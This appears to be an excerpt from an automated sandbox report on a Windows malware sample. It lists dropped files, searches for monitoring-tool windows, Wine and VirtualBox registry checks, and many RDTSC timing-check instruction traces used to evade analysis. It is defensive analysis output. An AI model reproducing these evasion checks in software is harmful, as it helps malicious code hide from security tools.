Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F448C second address: 5F44A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F44A4 second address: 5F44B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E27E7 second address: 5E27FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6E644F752Fh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E27FE second address: 5E2804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E2804 second address: 5E2815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 jc 00007F6E644F752Eh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F3809 second address: 5F380E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F380E second address: 5F381E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6E644F7526h 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F3DAB second address: 5F3DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5748 second address: 5F574C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F574C second address: 5F5795 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F6E64DC24B8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jg 00007F6E64DC24BEh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push eax 0x00000020 jns 00007F6E64DC24B6h 0x00000026 pop eax 0x00000027 pop eax 0x00000028 mov eax, dword ptr [eax] 0x0000002a push edx 0x0000002b jnl 00007F6E64DC24B8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 jc 00007F6E64DC24CAh 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5795 second address: 5F57CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Ch 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [ebp+122D3240h], edx 0x00000011 lea ebx, dword ptr [ebp+124555A9h] 0x00000017 mov ecx, dword ptr [ebp+122D31BCh] 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F6E644F752Ch 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F57CC second address: 5F57D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F57D2 second address: 5F57D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F57D7 second address: 5F57E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F57E1 second address: 5F57E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5883 second address: 5F5896 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F6E64DC24C4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5896 second address: 5F589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F589A second address: 5F58CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 mov dword ptr [ebp+122D1BE4h], edx 0x0000000e sub dword ptr [ebp+122D335Fh], ecx 0x00000014 popad 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2F38h], ecx 0x0000001d mov edx, 2209ADE5h 0x00000022 push 0F8A28B4h 0x00000027 jl 00007F6E64DC24C0h 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F58CB second address: 5F596C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 0F8A2834h 0x0000000d mov edx, 5E8FB8F3h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F6E644F7528h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D2A63h] 0x00000034 mov esi, dword ptr [ebp+122D2F51h] 0x0000003a push 00000000h 0x0000003c stc 0x0000003d push 00000003h 0x0000003f call 00007F6E644F752Ch 0x00000044 mov di, dx 0x00000047 pop ecx 0x00000048 jmp 00007F6E644F7532h 0x0000004d push D3AA6C5Bh 0x00000052 jbe 00007F6E644F752Eh 0x00000058 xor dword ptr [esp], 13AA6C5Bh 0x0000005f or dword ptr [ebp+122D24F4h], eax 0x00000065 lea ebx, dword ptr [ebp+124555B2h] 0x0000006b sub dword ptr [ebp+122D3838h], edi 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jns 00007F6E644F7528h 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F596C second address: 5F5971 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5AFB second address: 5F5AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5AFF second address: 5F5B09 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF0C7 second address: 5DF105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6E644F7535h 0x0000000b ja 00007F6E644F7526h 0x00000011 popad 0x00000012 push edx 0x00000013 jne 00007F6E644F7526h 0x00000019 pop edx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6E644F7530h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF105 second address: 5DF11D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E64DC24B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F6E64DC24B8h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615714 second address: 61571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6158A8 second address: 6158C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F6E64DC24B6h 0x00000012 jp 00007F6E64DC24B6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6158C0 second address: 6158CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E644F7526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615A20 second address: 615A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615D82 second address: 615D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615D87 second address: 615DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F6E64DC24C1h 0x0000000c popad 0x0000000d jmp 00007F6E64DC24C2h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jo 00007F6E64DC24E1h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615DBE second address: 615DE1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E644F7526h 0x00000008 jmp 00007F6E644F7531h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F6E644F752Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615F37 second address: 615F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615F3B second address: 615F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E644F7537h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615F60 second address: 615F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6160D0 second address: 6160D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6160D4 second address: 6160EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6162B2 second address: 6162B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6167F5 second address: 616824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6E64DC24C8h 0x00000011 jmp 00007F6E64DC24BBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61696A second address: 616970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616970 second address: 616995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F6E64DC24C9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616995 second address: 61699F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB54 second address: 60DB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB58 second address: 60DB72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7536h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB72 second address: 60DB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B07 second address: 616B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F6E644F752Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B1D second address: 616B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B23 second address: 616B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B29 second address: 616B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6170BD second address: 6170D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6170D2 second address: 6170D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6170D6 second address: 6170E0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E644F7526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6170E0 second address: 6170E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6173C4 second address: 6173C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6173C8 second address: 6173D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6173D5 second address: 6173DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6173DD second address: 6173E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61751D second address: 617529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6E644F7526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 617529 second address: 617533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 617533 second address: 61759D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007F6E644F7526h 0x00000016 jmp 00007F6E644F7538h 0x0000001b popad 0x0000001c jl 00007F6E644F7546h 0x00000022 jmp 00007F6E644F7533h 0x00000027 jmp 00007F6E644F752Dh 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jnc 00007F6E644F7528h 0x00000035 jl 00007F6E644F752Ah 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d push ebx 0x0000003e pop ebx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB26 second address: 60DB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB2F second address: 60DB54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6E644F7537h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8AC second address: 61E8BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8BF second address: 61E8C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8C4 second address: 61E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007F6E64DC24BEh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8D5 second address: 61E8E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8E4 second address: 61E8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F6E64DC24BCh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8FE second address: 61E916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F6E644F7526h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61D90D second address: 61D911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E77F9 second address: 5E7803 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623AFA second address: 623B04 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623B04 second address: 623B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6E644F7526h 0x00000009 je 00007F6E644F7526h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F6E644F7526h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623DA3 second address: 623DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623EA7 second address: 623EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6245F9 second address: 6245FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6246EB second address: 6246F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6246F0 second address: 6246FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6E64DC24BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624992 second address: 624998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6250EC second address: 6250F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62593A second address: 62593E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62624B second address: 62624F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6270D1 second address: 6270D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627AFF second address: 627B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627E09 second address: 627E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6270D7 second address: 6270DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627B05 second address: 627B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628913 second address: 628949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, dword ptr [ebp+122D27EBh] 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D28FBh] 0x00000018 push 00000000h 0x0000001a or si, 8900h 0x0000001f mov esi, dword ptr [ebp+122D18C5h] 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6290D8 second address: 6290DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6290DD second address: 6290FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F6E64DC24B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jp 00007F6E64DC24C2h 0x00000015 js 00007F6E64DC24BCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
